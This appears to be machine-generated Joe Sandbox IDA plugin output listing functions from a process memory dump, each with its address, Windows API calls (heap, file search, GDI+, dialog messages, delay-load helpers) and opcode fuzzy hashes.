Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 03eeae023560c276979f5e9f84374af4b5c8842876c056070152b82db4f74a50
Instruction ID: 4b27aba44fb19b3452170e7c08f9c2bd1f0700a208b51f22add92be8afa9c5a3
Opcode Fuzzy Hash: 03eeae023560c276979f5e9f84374af4b5c8842876c056070152b82db4f74a50
Instruction Fuzzy Hash: DCF0EC362002169FDF158E68ED0099A779DFF05B617144126FA65E71D0DF71DA60C790

Uniqueness

Uniqueness Score: -1.00%

Function 00108E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a3ecc72fcaa2897d90a5f44b570a90470ab6ce7e90cbb919f5e0ec3513b02da7
Instruction ID: 5309f87b0c3e4d51821f7c2e2a39adf3604691730147f8306604513115417cec
Opcode Fuzzy Hash: a3ecc72fcaa2897d90a5f44b570a90470ab6ce7e90cbb919f5e0ec3513b02da7
Instruction Fuzzy Hash: 13E0ED3120E2255AEA752629DC04B9B36989B523B0F160120BCD8970D1CFE0CD0082E4

Uniqueness

Uniqueness Score: -1.00%

Function 000E5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E5AC2

Part of subcall function 000EB505: __EH_prolog.LIBCMT ref: 000EB50A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ba6a1cdf825f6448e56244c6f4367d3f7928ae5b5e4f4f032eced3b8efc4c858
Instruction ID: 4d4cff026c25674db47f43ceed6b0f99cf42ee9b1228b086877c3452fa61d6d9
Opcode Fuzzy Hash: ba6a1cdf825f6448e56244c6f4367d3f7928ae5b5e4f4f032eced3b8efc4c858
Instruction Fuzzy Hash: FA018C308106D8DED725E7B8C0517EEFBA49F64304F50848DA556A3783CBB41B08E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000E9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,000E95D6,?,?,?,?,?,00112641,000000FF), ref: 000E963B

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 821a90e151258664bee4559069f5111728ed4d0614deb4cc1c9e49cf3024f5f4
Instruction ID: e9529442e715a7347c64be44b13a72719191dbf879ce9af27ee162ab722e11ff
Opcode Fuzzy Hash: 821a90e151258664bee4559069f5111728ed4d0614deb4cc1c9e49cf3024f5f4
Instruction Fuzzy Hash: 57F08970481B95AFDB308B25D55879277E86B12321F045B1FD0F6529E1D761658D8A40

Uniqueness

Uniqueness Score: -1.00%

Function 000EF3FA Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000EF430

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
Instruction ID: 2ddcf31ec784b0464c04086ee4d70a4cdc2e9e103c10b3d89e3ce64f65bb796f
Opcode Fuzzy Hash: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
Instruction Fuzzy Hash: A0E0D8712002913CD221523A1C01FFB9ADCCFAA724F14813FB1E9E61C2D6D0698442F5

Uniqueness

Uniqueness Score: -1.00%

Function 000EA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 000EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6C4
Part of subcall function 000EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6F2
Part of subcall function 000EA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000EA598

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 3f361d2ffb6bd2433799f7dbe2cff64a7eaf75a0327db8622ea1814ec05e17c0
Instruction ID: 6b278addf3b0d147f66b16f44a9821e2754e910970ed502e86388dd69e4b5d8d
Opcode Fuzzy Hash: 3f361d2ffb6bd2433799f7dbe2cff64a7eaf75a0327db8622ea1814ec05e17c0
Instruction Fuzzy Hash: 0AF05E320087D0AECA6257B98904BCBBBD06F1F331F148A4DF1FD72196C27560949B23

Uniqueness

Uniqueness Score: -1.00%

Function 000F0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 000F0E3D

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: f14edb3b8783d172e04a6cea2b8b5ce2da9021804644bd404d46c0d7e8ade431
Instruction ID: 3b984951b0387fa9cfcf0c6e19dc74318fa8144a8dd7e59be7fb55edfd762c86
Opcode Fuzzy Hash: f14edb3b8783d172e04a6cea2b8b5ce2da9021804644bd404d46c0d7e8ade431
Instruction Fuzzy Hash: E7D0C211A01098EADB21732939197FE2A4B8FE6310F0C0065B24967A87CB450882B261

Uniqueness

Uniqueness Score: -1.00%

Function 000FA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 000FA62C

Part of subcall function 000FA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000FA3DA

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: c9b90d76bf703e589d47a2e80f6c8a9cb03f8b3546353a326e08e7318388a776
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 60D0C7B531020DB6DF41AB61CC129BF7995EB45340F048125BE45D5552EAB1D910B562

Uniqueness

Uniqueness Score: -1.00%

Function 000FDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,000F1B3E), ref: 000FDD92

Part of subcall function 000FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
Part of subcall function 000FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
Part of subcall function 000FB568: IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
Part of subcall function 000FB568: TranslateMessage.USER32(?), ref: 000FB5AC
Part of subcall function 000FB568: DispatchMessageW.USER32(?), ref: 000FB5B6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 1f9616dfd64adc0591cd1a15338175792baa6445322a769da5be483bfea82ca4
Instruction ID: af6ed7e6565acb442eba4e0a7a5308dd8134a49f7c43d16ace78992b903d3243
Opcode Fuzzy Hash: 1f9616dfd64adc0591cd1a15338175792baa6445322a769da5be483bfea82ca4
Instruction Fuzzy Hash: DBD09E31144300BBD6112B51DD06F1A7AA2AB98F04F404554B384744B2C6729D71EF11

Uniqueness

Uniqueness Score: -1.00%

Function 000FE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 000FE5E3

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 6c8d5cb5f3d508e247d54f8315ccee07065774e8f7b389ae29a5438f58ba8592
Instruction ID: 1d0d5eaf253aaccfdf6fbfc80cf6513b7e0cca663e7822da03d22638c8c8b967
Opcode Fuzzy Hash: 6c8d5cb5f3d508e247d54f8315ccee07065774e8f7b389ae29a5438f58ba8592
Instruction Fuzzy Hash: 94D0A9B40C03C8AAC301FBA8DC867B83290B320BA4F900001B308C6CB2CB6041C0E601

Uniqueness

Uniqueness Score: -1.00%

Function 000E98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,000E97BE), ref: 000E98C8

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 9d6ee85a13f2ac184bb1107bc8cb25461a66895fb773542e1a9d2e1d6f20c2cb
Instruction ID: 0e55b7d5a7b24c1cc472e083d1f8229a9981e214e43df74dae25b8420d2e85bb
Opcode Fuzzy Hash: 9d6ee85a13f2ac184bb1107bc8cb25461a66895fb773542e1a9d2e1d6f20c2cb
Instruction Fuzzy Hash: DFC012344041458D8E6446269A440D9B391AB933657B48694D028950F1C722CC87EA11

Uniqueness

Uniqueness Score: -1.00%

Function 000EF1E8 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 000EF1F2

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 88e4cc5bd9843c942ac854cb006e0641b2f83eb1c428bea43cb0f46f68ea8b00
Instruction ID: da9265297d158c67b6725a774b42e5fe85c5c5b7465ef8d9ccabb4e3b8661ab8
Opcode Fuzzy Hash: 88e4cc5bd9843c942ac854cb006e0641b2f83eb1c428bea43cb0f46f68ea8b00
Instruction Fuzzy Hash: B9D0C971410212CFD7A48F29E404781BBE0AF08311B21887E90D9D2524E6708880CF40

Uniqueness

Uniqueness Score: -1.00%

Function 000FE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 97aee0062237b5fcf9e74702a23a524b701a132e796d2801801881838b355d33
Instruction ID: 411bb4deee4fd72223c4881daab9da2da8dece1b95911a18ab457d816a0a74f3
Opcode Fuzzy Hash: 97aee0062237b5fcf9e74702a23a524b701a132e796d2801801881838b355d33
Instruction Fuzzy Hash: D1B012E53982C4BD712821469D02C7B020DC3C1F20330C43EFD1AD0CA1DD40AC413871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 523c592c024f27818e5d183c0eb6ec97b55bc97966e98b08de6e34458a8e8bd4
Instruction ID: 7a7cc5a3032ba48e72c206af51a6516c6e3e535410dcc67dc1c67471c3b6c866
Opcode Fuzzy Hash: 523c592c024f27818e5d183c0eb6ec97b55bc97966e98b08de6e34458a8e8bd4
Instruction Fuzzy Hash: 1AB012E539C288AD7168614A9D02C7B020DD3C0F20330803EF91EC08A1DD406C413971

Uniqueness

Uniqueness Score: -1.00%

Function 000FE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa260755001bed85d61de892d65388c6e71b2b88f50c2b475b13a7cbfdf01f57
Instruction ID: 2b51a2e9564773dfdcc54c292f839e9b57da7195ac68b6124d9014c022f8b3d5
Opcode Fuzzy Hash: fa260755001bed85d61de892d65388c6e71b2b88f50c2b475b13a7cbfdf01f57
Instruction Fuzzy Hash: DFB012E13981C4AC716866069D02C7B024DC3C1F20334C03EFD1AC09E1DD40AC452871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ba38f4d39c4dc6739e71e7633acb0449be7c8ca9b19196386a9a0a402f222934
Instruction ID: 36a49485081ebfecb9f0cf7c896eb04eb049fc05058640f46c4071486c005949
Opcode Fuzzy Hash: ba38f4d39c4dc6739e71e7633acb0449be7c8ca9b19196386a9a0a402f222934
Instruction Fuzzy Hash: E9B012E1398194AC716862069E02C7B420DC3C0F20334C03EF91AC09E1DD506D4A2871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55145d376569c8198a5570ee03a8c31c65622d4ed98a75ab853935aa7436bed9
Instruction ID: 7e2a48c90b3c99f71f063d15e89038236b8b8889ef20807983bed1bc33feb746
Opcode Fuzzy Hash: 55145d376569c8198a5570ee03a8c31c65622d4ed98a75ab853935aa7436bed9
Instruction Fuzzy Hash: 27B012E13982C4BC71A862069D02C7B020DC3C0F20334C53EF91AC09E1DD406C852871

Uniqueness

Uniqueness Score: -1.00%

Function 000FE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

